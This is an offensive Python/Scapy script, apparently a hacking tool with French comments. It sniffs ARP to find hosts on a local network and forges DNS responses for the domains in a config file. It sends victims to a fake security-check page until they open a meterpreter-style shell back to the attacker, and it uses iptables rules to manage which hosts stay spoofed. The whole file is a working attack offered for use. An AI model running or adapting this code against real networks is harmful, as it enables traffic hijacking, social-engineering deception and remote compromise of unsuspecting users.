# dnSe # Author: St0rn # # Attaque combinant du DNS Spoofing avec une fausse page demandant # une verification de securite (SE), la page reste bloque sur la # "Page de Verification" tant que la connexion (meterpreter ou autre) # n est pas etablit, une fois qu'elle l est, l hote en question est # sorti du dns spoofing. Decouverte d hotes automatique et continu. # # argv[1] = Port du shell ; argv[2] = device # #!usr/bin/env/python import os import sys import string import thread from scapy.all import * ######################### List ######################## file_list = [] host = [] black_list = [] domain = [] domain_type = [] spoof_ip = [] ################## Read file Function ################# def read_file(): try: file = open('dns.spoof', 'r') while 1: line = file.readline() if line == "": break if line[0] != '#': file_list.append(line) file.close() for i in range(len(file_list)): split = file_list[i].split(" ") domain.append(split[0]) domain_type.append(split[1]) spoof_ip.append(split[2].replace("\n","")) except: print "\n\033[91mCan't open Domain File\033[0m" sys.exit() ###################### ARP Discovery ################### def arp_sniff(p): if p.haslayer(ARP) and p[ARP].op == 2: if p[ARP].psrc not in host: host.append(p[ARP].psrc) print "\n\033[31m Host " + p[ARP].psrc + " added to Host List\033[0m" def sniff_arp(device): try: sniff(prn = arp_sniff, iface = device) except: print "\n\033[91m Can't launch ARP Discovery sniffer :'(\033[0m" sys.exit() ################### Detect Session ##################### def detect_session(p): if p.haslayer(IP) and p.haslayer(TCP): if p[TCP].dport == int(sys.argv[1]) and p[IP].src not in black_list: black_list.append(p[IP].src) os.system("iptables -A INPUT -p udp --sport 53 -d " + p[IP].src + " -j ACCEPT") print "\n\033[92m Session Detected\033[0m" def sniff_session(device): try: sniff(prn = detect_session, iface = device) except: print "\n\033[91mCan't launch Session Detect sniffer :'(\033[0m" sys.exit() ################# DNS Spoofing Attack ################### def attack(p): if p.haslayer(UDP) and p.haslayer(DNS) and not p.haslayer(DNSRR): l = len(p[DNS][DNSQR].qname) if p[DNS][DNSQR][0:l-1].qname[0:l-1] in domain: os.system("iptables -A INPUT -p udp --sport 53 -s " + p[IP].dst + " -j DROP") if p[IP].src in host and p[IP].src not in black_list: ether = Ether(dst = p[Ether].src, src = p[Ether].dst) ip = IP(dst = p[IP].src, src = p[IP].dst) udp = UDP(sport = p[UDP].dport, dport = p[UDP].sport) dns = DNS(id = p[DNS].id, qr = 1, opcode = 16, aa = 0, tc = 0, rd = 0, ra = 1, z = 8, rcode = 0, qdcount = 1, ancount = 1, nscount = 0, arcount = 0, qd = p[DNS].qd) nb = domain.index(p[DNS][DNSQR].qname[0:l-1]) dns.an = DNSRR(rrname = p[DNS][DNSQR].qname[0:l-1], type = domain_type[nb], rclass = "IN", ttl = 1337, rdata = spoof_ip[nb]) payload = ether/ip/udp/dns sendp(payload, verbose = 0, iface_hint = p[IP].src) print "\n\033[94m " + p[DNS][DNSQR].qname[0:l-1] + " answer by " + p[IP].src + " spoof to " + spoof_ip[nb] + "\033[0m" ######################### Main ########################### os.system("clear") if len(sys.argv) < 3: print "\nUsage: dnSe.py <Listen port> <interface>\n" else: read_file() try: thread.start_new_thread(sniff_arp, (sys.argv[2], )) except: print "\n\033[91mCan't start thread\033[0m" sys.exit() try: thread.start_new_thread(sniff_session, (sys.argv[2], )) except: print "\n\033[91mCan't start thread\033[0m" sys.exit() try: sniff(filter = "udp port 53", prn = attack, iface = sys.argv[2]) except: print "\n\033[91mCan't launch Attack sniffer :'(\033[0m" sys.exit() ########################### #dns.spoof: # #Domaine type spoof_ip #Bien respecter un seul #espace entre les arguments. #Les commentaires ne #sont pas pris en compte #et son du type: #
St0rn